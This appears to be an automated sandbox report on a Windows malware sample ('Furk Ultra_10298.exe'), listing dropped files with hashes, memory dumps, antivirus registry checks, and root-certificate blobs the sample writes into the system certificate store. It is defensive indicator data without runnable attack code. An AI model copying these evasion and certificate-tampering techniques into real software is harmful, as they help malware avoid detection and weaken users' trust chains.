memory/3052-308-0x0000000000000000-mapping.dmp

memory/4504-309-0x0000000000000000-mapping.dmp

memory/2616-310-0x0000000000000000-mapping.dmp

memory/4720-311-0x0000000000000000-mapping.dmp

memory/1012-312-0x0000000000000000-mapping.dmp

memory/4472-313-0x0000000000000000-mapping.dmp

memory/5112-314-0x0000000000000000-mapping.dmp

memory/3080-315-0x0000000000000000-mapping.dmp

memory/1784-316-0x0000000000000000-mapping.dmp

memory/1808-317-0x0000000000000000-mapping.dmp

memory/632-318-0x0000000000000000-mapping.dmp

memory/4104-319-0x0000000000000000-mapping.dmp

memory/3536-320-0x0000000000000000-mapping.dmp

memory/4280-321-0x0000000000000000-mapping.dmp

memory/1740-322-0x0000000000000000-mapping.dmp

memory/4048-323-0x0000000000000000-mapping.dmp

memory/3456-324-0x0000000000000000-mapping.dmp

memory/3496-325-0x0000000000000000-mapping.dmp

memory/3636-326-0x0000000000000000-mapping.dmp

memory/3560-327-0x0000000000000000-mapping.dmp

memory/4932-328-0x0000000000000000-mapping.dmp

memory/4548-329-0x0000000000000000-mapping.dmp

memory/4336-330-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3bb0bdb597a1fd127cbaa4f35302c377
SHA1 29070fd60ac0ababfecf73c26649eeae8c8f430d
SHA256 3787ce358aaab53861b94920588489cca71d0dc81a2e3f0dc563ea1f0c243b3b
SHA512 6a114cc4360bc87c708c476462919acdf7a36084a7348d81042fe9cd48374258ba3969b498b0ca9a9444b53e800344d560ee43ed4a2c9ddeb254a93d41216ec1

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/5036-336-0x00007FFAE29A0000-0x00007FFAE3461000-memory.dmp

memory/5036-337-0x00007FFAE29A0000-0x00007FFAE3461000-memory.dmp

C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe

MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
SHA512 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020

C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe

MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
SHA512 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020

memory/4748-340-0x0000000034CC0000-0x0000000035CC0000-memory.dmp

memory/4748-343-0x0000000049890000-0x0000000049915000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\omni.ja

MD5 3569909da198e6681650054ebafa2190
SHA1 dd4fd1cb0c899b98a2322657b77787ce18f3d7ac
SHA256 cd02424977b06035e2d3f6c6a75c488b11480b135e817bc870589df608b8a112
SHA512 571faa39b136aff1f32957f85e6cef34f5f7f26596ab2563f719c7e857e20bbb0aa520d41bc8edd8bc9f835a11c24f5531b2e854c7ad521843390387e8774404

memory/4748-348-0x0000000049B60000-0x0000000049BC4000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 cbd67300a1b97005c288550af7942b8f
SHA1 929592e3fc36c2d18ef541c65d798f1ed4ad558e
SHA256 c6150ebeaca05e32c24d358dfc6e0984324c84b819d57c77107dbc63a40f2e2e
SHA512 41c06af16fe2340a2d546b252857bbf29a87589f23a2d169462274f557ba73240823daec4eb6fe8aff270d40e20a4658709ecbc4112a1547b577a1012cda2346

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 7b3f9454b5839584f6bbe4ce0638250e
SHA1 95010293da90d63f1f39c1404373bb313fd32d89
SHA256 8a62787f7a8eb7ddac05dadc6254e3c49a254fe10e3bd21f7b229f57b4d2e3af
SHA512 634239e5f569754b1fb46cd5eaf0b074a6d88ba3678ed96b72fd4c0dd3ab9866a77ad9fbc122a5736bbd89a15337efa6039ec6c43b0be8beac0a6446e8fc64e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 e2221c6301727cd1b2adffe308c15728
SHA1 92fb0f132888e9bd32b8d6be5832c8571581618c
SHA256 7e545868f36b3755c80466719c6d8920179f398136c0f6d99f986f4ace744329
SHA512 3f7ee9c5a809487e67e2ed5d8fd2130e5069b59e669abb2cc0ed9537504e6cd745af950e142247b45e78074a67caa855b9194d42ca3a7a16e6b6ce98114e1b5a

C:\Program Files (x86)\XxxUzwYQU\GnbMyEB.xml

MD5 915c57cdbffb1a77efc21e2e004e6f7e
SHA1 1f76377a7ed327aaa87f4b4f43f028721e96fb1a
SHA256 18dd7af08cc8cee0cc79c17e5a411a16878f98d5bfdc676f42370ad27ff5aa00
SHA512 fa985685aa1e56f779bc0d6b144ad31f770f18252870e5e63243bdef676a212ee8452f60f4a0af4476e7707e77ae90b3f742a7ffbbc8d2d6cf2628383a80231e

C:\Program Files (x86)\WyuevociGfNU2\LzOYMrW.xml

MD5 a34f1550125d7aeff98af080c0472cf6
SHA1 c467a5d721c78b570606091a393a9b9b66423bfd
SHA256 197c9900b4e837627a911aa5b6c827ae8b45ac24c711d28325db451128f328a5
SHA512 0cc8a40b912c4e0df4db03b10a82d398dc7833d3c0a7de100436e84da59122037bfdd0d7554a40e0adb7a2a8e508a92e903d983c54db0758d8a4a5ba8197a7b0

C:\ProgramData\FZMYpcBymcbXiuVB\WUpZOtb.xml

MD5 fd1e5f7e6d4ba02f19cd04987e89aaa0
SHA1 e6aea34f856582af5a07991624a41dceaea84562
SHA256 d68de4e1fbc953f2aeb34852a1a15e65e858344af1875ea6f2bbf9ca310fa71f
SHA512 e84a9ef02a58510eed0dac3924170cf12fc85b505665d86b15c0ee1d6f19a66bd231e4461e52e0af7cb6990a821afafaedb50c975204f61e8a75056c26d0cdc4

C:\Program Files (x86)\OdCkbftzuRPDCLooswR\dsKYSUK.xml

MD5 b2407ed7c6a616158688e9b988f13f4b
SHA1 55b5041b16079e33a68b433304df423deeda71c4
SHA256 03f4fb9a1d7025f28fa8cefc0cf7437586b7c3eb26a5f3171a3bac24f1e62c7b
SHA512 20c99a6dd4a679a99232ade17682270e2522a005c797c4912095b6aaf48301ac8176727e15b1e4d6643f04d8855c293c760b8902ddcf8b0f745eac14268fd3eb

C:\Program Files (x86)\unWhUoTpcLxwC\CqRtzkA.xml

MD5 2335af0a295e267dfd6912d7d89eb008
SHA1 0bdbd0b7cb70a4fc808e9e98be349cd1e5a6b424
SHA256 0a9608aa0dc1e97d9b43f14afbfec3f65507cfba5153a571391787b3bcafc537
SHA512 0e06c7f5707c28da79012520ce7288a046e56816d0a384aeaa9625132dacacff3fca881382c643310547058d85d903e3fc839c261bb5f59d3910052e5893b281

memory/4748-359-0x000000004A670000-0x000000004A6E5000-memory.dmp

memory/4748-362-0x000000004A7B0000-0x000000004A869000-memory.dmp

memory/2444-365-0x0000000010000000-0x0000000011000000-memory.dmp

memory/2444-367-0x0000000010630000-0x0000000011630000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:16

Platform

win10v2004-20221111-en

Max time kernel

84s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe N/A

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV\Dir C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast\Version C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast\Version C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A

Checks installed software on the system

discovery

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4 C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 0f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd94090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b0601050507030762000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3390b000000010000001800000045006e00740072007500730074002e006e006500740000001400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab1d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d347e000000010000000800000000c001b39667d6010300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d42000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6 C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 190000000100000010000000fa46ce7cbb85cfb4310075313a09ee050300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d47e000000010000000800000000c001b39667d6011d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d341400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab0b000000010000001800000045006e00740072007500730074002e006e0065007400000062000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3397f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b06010505070307530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd942000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92fea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6 